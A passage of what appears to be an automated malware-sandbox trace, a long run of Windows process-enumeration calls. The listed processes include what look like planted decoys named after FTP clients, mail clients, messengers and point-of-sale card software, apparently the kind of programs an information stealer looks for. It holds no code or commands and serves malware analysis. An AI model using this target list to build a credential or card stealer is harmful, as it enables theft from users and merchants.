cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.183] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.185] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.188] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.191] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.192] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0230.194] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0230.195] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.198] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0230.200] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.201] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0230.203] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0230.204] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0230.206] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0230.208] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0230.210] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0230.212] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.253] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0230.257] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0230.259] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0230.261] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.263] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0230.265] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0230.266] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0230.269] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0230.271] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0230.275] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0230.278] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0230.280] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0230.283] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0230.285] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0230.288] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0230.290] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0230.331] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0230.334] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0230.353] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0230.355] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0230.356] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0230.358] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0230.360] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0230.362] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0230.364] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0230.365] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0230.367] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0230.370] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0230.373] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0230.376] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0230.391] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0230.394] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0230.416] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0230.419] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0230.422] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0230.425] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0230.428] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0230.431] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0230.434] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0230.437] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0230.440] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0230.444] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0230.447] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0230.450] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0230.499] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0230.501] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0230.504] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0230.510] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0230.512] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0230.514] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0230.516] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0230.518] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0230.520] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0230.522] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0230.524] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0230.526] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0230.529] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0230.531] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0230.533] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0230.534] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0230.567] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0230.570] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0230.574] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0230.576] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0230.579] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0230.582] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0230.584] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0230.587] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0230.589] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: 